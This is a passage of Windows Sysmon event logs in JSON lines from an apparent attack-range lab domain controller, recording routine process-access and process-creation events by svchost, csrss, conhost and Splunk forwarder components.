{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6059,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.880\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.880","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6060,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.880\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.880","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6061,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.880\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2129-5F25-0000-0010FE5D0900}\r\nTargetProcessId: 2996\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.880","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2129-5F25-0000-0010FE5D0900}","TargetProcessId":"2996","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6062,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:43.365\r\nProcessGuid: {41C8662E-212B-5F25-0000-0010EC5F0900}\r\nProcessId: 4956\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:00:43.365","ProcessGuid":"{41C8662E-212B-5F25-0000-0010EC5F0900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6063,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:43.365\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-212B-5F25-0000-0010EC5F0900}\r\nTargetProcessId: 4956\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:43.365","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-212B-5F25-0000-0010EC5F0900}","TargetProcessId":"4956","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6064,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:43.365\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-212B-5F25-0000-0010EC5F0900}\r\nTargetProcessId: 4956\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:43.365","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-212B-5F25-0000-0010EC5F0900}","TargetProcessId":"4956","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6065,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:43.365\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:43.365","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6066,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:43.365\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:43.365","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6067,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:43.365\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 